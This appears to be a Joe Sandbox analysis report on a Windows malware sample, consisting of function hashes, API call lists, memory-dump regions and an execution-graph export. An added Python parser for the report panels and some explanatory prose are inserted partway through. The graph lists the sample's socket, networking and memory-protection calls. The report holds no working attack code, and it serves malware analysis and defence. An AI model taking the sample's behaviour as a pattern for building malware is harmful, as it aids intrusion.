                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction ID: 5d8201fa0a053522d8e2745fc031291a5de4dcc2ccc761ece97f39acabe0c75f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46D10272B08A918AF710DF75D4403ACBBB1FB64798B804276DE5E97B89DE38D106C321
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction ID: b646dc32fdc2b01716099ffc340b7a1ed4211f84c7692e1b8b8c957dbdd4d13a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F510772F0421186FB14EF749A957BCA7A1EB68368F900277DD1E52AEDDB3CA402C611
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction ID: cec8a74ef634075d583b2d591895f3102ba968675d24564c1a9b005a7a1d460a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF517A62E086418AFB10EFB1D4503BDA7B5EB68B58F908576DE0D5B688DF3CD4408762
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction ID: 116b9c171df06c3b699768c802153cc3758b5bc8230ba9d9a71ca4fcbbf4221e
• Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction Fuzzy Hash: B811C631A0C54242F754E76AE5C437A9392EB98788FC44072DB4907B8DCD7DE9C58222
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
• Instruction ID: 0832f63381606b910b54b91cc4a58b1e48be86c60960d9c6e05e0e605ec3dc26
• Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
• Instruction Fuzzy Hash: 01412922A0828242FB60EB25D50577AE760EB81BA4F944276EE5C07ADDFF3CD441C721
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD19046
  • Part of subcall function 00007FF7EAD1A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
  • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7EAD0CBA5), ref: 00007FF7EAD19064
Strings
• C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, xrefs: 00007FF7EAD19052
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
• API String ID: 3580290477-3707282323
• Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
• Instruction ID: 09989019731bc11d295b86d517404659dbd2b4d5995e343ae4d049c5235a4405
• Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
• Instruction Fuzzy Hash: F3418C72A08A0286FB15EF31D8402BDA7A4EB55790B9540B6E94E47B99DE3CE4C1C322
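Each function panel above is one record: the APIs it reaches (directly, or via a "Part of subcall function" line attributed to the callee), the strings it references with their xrefs, the memory dump region the code was lifted from, and a Similarity block whose Opcode ID is the stable key for matching the same function across reports. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses such panels into structured records so Opcode IDs, reached APIs and dump-region metadata can be pivoted on. It assumes the bullet layout shown on this page, and it treats the fifth dot-separated field of an .sdmp filename as a Win32 PAGE_* protection value; that is an assumption (the field is undocumented here), although it is consistent with this report, where the code region carries 0x20 and the header and data regions carry 0x02 and 0x04. The sample text is copied from the two panels above with argument lists, Associated lines and fuzzy hashes trimmed.

```python
"""Parse the per-function APIs / Strings / Memory Dump Source / Similarity
panels of a Joe Sandbox report into structured data (added example)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Win32 PAGE_* constants (winnt.h). ASSUMPTION: the fifth dot-separated field
# of an .sdmp filename is the region's protection; in this report it is 0x20
# for the code region and 0x02/0x04 for header and data, which is consistent.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
SIM_KEYS = {"API ID": "api_id", "String ID": "string_id", "Opcode ID": "opcode_id"}
API_RE = re.compile(r"^(?:Part of subcall function [0-9A-F]+: )?(\w+)\.(\w+)(?:\(.*\),)? ref: ([0-9A-F]+)$")
STR_RE = re.compile(r"^(.*), xrefs: ([0-9A-F]+)$")
SRC_RE = re.compile(r"^Source File: (\S+), Offset: ([0-9A-F]+)")


@dataclass
class FunctionRecord:
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    apis: list = field(default_factory=list)     # (api, module, ref_addr, via_subcall)
    strings: list = field(default_factory=list)  # (text, xref_addr)
    source_file: str = ""
    image_base: int = 0
    protection: str = ""


def decode_sdmp_protection(name: str) -> str:
    """Map the protection field of an .sdmp filename to its PAGE_* name."""
    fields = name.split(".")
    if len(fields) < 5:
        return ""
    value = int(fields[4], 16)
    return PAGE_PROTECTION.get(value, f"0x{value:X}")


def parse_records(text: str) -> list[FunctionRecord]:
    """One FunctionRecord per panel; a panel starts at "APIs" and ends with "Similarity"."""
    records, section, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if line == "APIs":                      # a new function panel begins
                rec = FunctionRecord()
                records.append(rec)
            continue
        if rec is None or not line.startswith("• "):
            continue
        item = line[2:].strip()
        if section == "Similarity":
            key, _, value = item.partition(":")
            if key.strip() in SIM_KEYS:
                setattr(rec, SIM_KEYS[key.strip()], value.strip())
        elif section == "APIs" and (m := API_RE.match(item)):
            rec.apis.append((m[1], m[2], m[3], item.startswith("Part of subcall")))
        elif section == "Strings" and (m := STR_RE.match(item)):
            rec.strings.append((m[1], m[2]))
        elif section == "Memory Dump Source" and (m := SRC_RE.match(item)):
            rec.source_file, rec.image_base = m[1], int(m[2], 16)
            rec.protection = decode_sdmp_protection(m[1])
    return records


def imported_apis(rec: FunctionRecord) -> list[str]:
    """module!api names reached directly or through subcalls. LIBCMT symbols
    are statically linked CRT internals, not imports, so they are dropped."""
    return sorted({f"{mod}!{api}" for api, mod, _, _ in rec.apis if mod != "LIBCMT"})


# Two panels copied from this report; argument lists and Associated lines trimmed.
SAMPLE = r"""
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD19046
  • Part of subcall function 00007FF7EAD1A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7EAD22D22), ref: 00007FF7EAD1A95E
  • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22), ref: 00007FF7EAD1A968
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7EAD0CBA5), ref: 00007FF7EAD19064
Strings
• C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, xrefs: 00007FF7EAD19052
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
• Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
"""
```

Running `parse_records(SAMPLE)` yields two records; the second resolves to `KERNEL32!GetLastError`, `KERNEL32!GetModuleFileNameW` and `NTDLL!RtlFreeHeap`, with the subcall flag preserved so a reader can tell a direct call at the listed address from one the sandbox attributed to a callee. Keying the records by `opcode_id` is the natural way to diff two reports of the same family, since the Opcode ID survives relocation while the `ref` addresses depend on the image base.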
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
• Instruction ID: a2595562d678dce318dea90b3f32f44ee078f15d798888efe63efa9cfaa06a50
• Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
• Instruction Fuzzy Hash: BD41D632B18B5181EB60DF25E4443BAABA5FB98B84F804132EE4D87798EF3CD401CB51
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
• Instruction ID: e5a636bf4574df351d9f193d1bc54ae2bd4c38df9f6831aaec94935af671b0e1
• Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
• Instruction Fuzzy Hash: 9221C362B0864181FB20EB21D04436DA3E1FBA8B44FC5417BD69D43698DF7CE545CB62
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
• Instruction ID: 0f7d24ecbdfb765eea94364325dd8b81555a85adc87ed2c9e4b4c66f6e34aa2a
• Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
• Instruction Fuzzy Hash: 5E112E32618B8182EB61DF15E44035AB7E5FB88B98F684671DB8D07758DF3CD551CB10
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction ID: 6ac71f684b0196dc91a5adc0b388a21a3753f3f1d86e1d51e424bfae0a360557
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F018F6291C20686F721FF60946537EA3A0EF58745FC10077D54D83699DE7CE904CB36

Execution Graph

Execution Coverage:2.5%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:2%
Total number of Nodes:791
Total number of Limit Nodes:29
The execution graph is rendered as an interactive diagram on the original report page; what survives in text is its flattened node/edge export. Each node is written as a decimal node id, a lowercase hex address and zero or more labels (Windows API names, CRT-internal symbols, unresolved call targets as raw addresses, or summaries such as "54 API calls"), and each edge as "id->id". The export begins: execution_graph 74801 7ff7ead0cc3c 74822 7ff7ead0ce0c 74801->74822 (first tokens shown) and breaks off mid-stream in this copy of the report. The nodes that name Windows APIs, by address:

Sample image (memory dump base 0x7ff7ead00000):
• 7ff7ead0d28b GetStartupInfoW; 7ff7ead0d2b8 GetModuleHandleW
• 7ff7ead036bc GetModuleFileNameW; 7ff7ead036eb GetLastError
• 7ff7ead09280 FindFirstFileExW; 7ff7ead092bf FindClose
• 7ff7ead09300 CreateFileW, GetFinalPathNameByHandleW, CloseHandle
• 7ff7ead09440 WideCharToMultiByte, WideCharToMultiByte
• 7ff7ead093b2 MultiByteToWideChar; 7ff7ead093f3 MultiByteToWideChar
• 7ff7ead08859 GetEnvironmentVariableW; 7ff7ead08876 ExpandEnvironmentStringsW
• 7ff7ead03da7 SetDllDirectoryW, LoadLibraryExW; 7ff7ead03dd7 SetDllDirectoryW
• 7ff7ead08e94 LoadLibraryExW
• 7ff7ead04012 PostMessageW, GetMessageW
• 7ff7ead090c0 LocalFree
• 7ff7ead03670 FreeLibrary; 7ff7ead06fc0 FreeLibrary
• 7ff7ead0649a GetLastError
• 7ff7ead15672 CreateFileW; 7ff7ead156bb CloseHandle; 7ff7ead156d1 CloseHandle
• 7ff7ead1546c EnterCriticalSection; 7ff7ead202d8 EnterCriticalSection; 7ff7ead15478 LeaveCriticalSection; 7ff7ead184f8 LeaveCriticalSection; 7ff7ead20338 LeaveCriticalSection
• 7ff7ead0c8e0 IsProcessorFeaturePresent
• 7ff7ead0cad8 RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
• 7ff7ead0c8a0 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess

Loaded modules in the 0x7ff8 range (this part of the report does not name them):
• 7ff8e80f22c8 IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry
• 7ff8e81310c0 WSAStartup
• 7ff8e81327a7 VerSetConditionMask (three calls); 7ff8e81327f7 VerifyVersionInfoA
• 7ff8e81329f0 IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry
• 7ff8e8134215 UuidFromStringW; 7ff8e8134258 UuidFromStringW
• 7ff8e81343cf htons, htonl; 7ff8e81344eb htons
• 7ff8e813544c bind
• 7ff8e8135553, 7ff8e813555b, 7ff8e81355c0, 7ff8e81355c8, 7ff8e81355e8 WSAGetLastError
• 7ff8e8135712 closesocket
• 7ff8e8137645 getaddrinfo; 7ff8e8137785 FreeAddrInfoW; 7ff8e813780f FreeAddrInfoW
• 7ff8e7533ed7 LoadLibraryA; 7ff8e7533f10 GetProcAddress; 7ff8e7533f32 VirtualProtect, VirtualProtect
• 7ff8e6c89b0e LoadLibraryA; 7ff8e6c89b47 GetProcAddress; 7ff8e6c89b69 VirtualProtect, VirtualProtect

Unresolved call targets appear in the export as raw addresses on a node (00007FF8E70A082C at 7ff8e8131102, 00007FF906024340 at 7ff8e8134e88, 00007FF906013440 at 7ff8e8135732). The LoadLibraryA, GetProcAddress, VirtualProtect sequence occurs identically in two different images, so it is a shared code pattern rather than something specific to one module. Nodes labelled only "N API calls" are summaries of sub-calls and are not listed here.
7ff8e813660c 75836->75849 75852 7ff8e81348b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry select 75836->75852 75837->75836 75837->75839 75838->75837 75839->75832 75840->75836 75841->75840 75842->75836 75843 7ff8e81355fd WSAGetLastError 75842->75843 75843->75836 75843->75839 75847 7ff8e8136c02 75846->75847 75848 7ff8e8136c10 send 75846->75848 75847->75848 75848->75836 75850 7ff8e8136622 75849->75850 75851 7ff8e8136630 recv 75849->75851 75850->75851 75851->75836 75852->75836 75853 7ff8e8137174 75854 7ff8e8137187 75853->75854 75856 7ff8e81371a4 75854->75856 75857 7ff8e81349cc 75854->75857 75858 7ff8e8139568 75857->75858 75859 7ff8e81349e6 ioctlsocket 75858->75859 75860 7ff8e8134a1c 75859->75860 75862 7ff8e8134a12 75859->75862 75861 7ff8e8134a22 WSAGetLastError 75860->75861 75861->75862 75862->75856 75863 7ff8e8136654 75865 7ff8e81366a5 75863->75865 75864 7ff8e81366b3 75865->75864 75867 7ff8e81365ac 75865->75867 75868 7ff8e81365b9 75867->75868 75869 7ff8e81365b5 75867->75869 75870 7ff8e81354ac 12 API calls 75868->75870 75869->75864 75870->75869 75871 7ff8e8135754 75872 7ff8e81340f0 14 API calls 75871->75872 75875 7ff8e8135794 75872->75875 75874 7ff8e81357ed 75877 7ff8e81357ce 75875->75877 75878 7ff8e81347a0 75875->75878 75892 7ff8e81329f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 75877->75892 75879 7ff8e8139568 75878->75879 75880 7ff8e81347c4 connect 75879->75880 75881 7ff8e81347e2 75880->75881 75882 7ff8e81347ea WSAGetLastError WSAGetLastError 75881->75882 75891 7ff8e8134826 75881->75891 75883 7ff8e8134803 75882->75883 75884 7ff8e8134816 75883->75884 75886 7ff8e813483e 75883->75886 75883->75891 75885 7ff8e813481b WSASetLastError 75884->75885 75884->75891 75885->75891 75887 7ff8e813485a 75886->75887 75888 7ff8e8134873 75886->75888 75890 7ff8e81354ac 12 API calls 75887->75890 75889 7ff8e81354ac 12 API calls 75888->75889 75889->75891 75890->75891 75891->75877 75892->75874 75893 7ff8e8135cf4 75897 
7ff8e8135d2e 75893->75897 75895 7ff8e8135e2c 75924 7ff8e81329f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 75895->75924 75897->75895 75899 7ff8e8135e54 75897->75899 75898 7ff8e8135e40 75902 7ff8e8135e9e 75899->75902 75900 7ff8e8135ef3 75904 7ff8e81360c6 75900->75904 75910 7ff8e8135f07 75900->75910 75901 7ff8e813619e 75906 7ff8e81361cd WSASocketW 75901->75906 75902->75900 75902->75901 75903 7ff8e8135f11 75902->75903 75925 7ff8e81329f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 75903->75925 75904->75903 75909 7ff8e813611d getsockname 75904->75909 75908 7ff8e81361fa 75906->75908 75907 7ff8e8135f43 75907->75895 75913 7ff8e8136078 75908->75913 75914 7ff8e81360aa 75908->75914 75911 7ff8e8136140 75909->75911 75912 7ff8e8136134 75909->75912 75910->75903 75917 7ff8e813603a WSASocketW 75910->75917 75911->75913 75915 7ff8e8136149 WSAGetLastError 75911->75915 75912->75914 75916 7ff8e8136160 getsockopt 75912->75916 75926 7ff8e8134da4 WSAGetLastError 75913->75926 75927 7ff8e8134740 ioctlsocket WSAGetLastError 75914->75927 75915->75912 75915->75913 75916->75913 75916->75914 75920 7ff8e8136072 75917->75920 75920->75913 75922 7ff8e8136082 SetHandleInformation 75920->75922 75921 7ff8e813609c closesocket 75921->75903 75922->75914 75923 7ff8e8136094 75922->75923 75923->75903 75923->75921 75924->75898 75925->75907 75926->75903 75927->75923 75928 7ff8e8136ff4 75930 7ff8e813702a 75928->75930 75931 7ff8e813702e setsockopt 75930->75931 75932 7ff8e81370b6 75930->75932 75934 7ff8e81370f7 75931->75934 75933 7ff8e8137123 setsockopt 75932->75933 75932->75934 75933->75934
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: ConditionMask$00007A082InfoStartupVerifyVersion
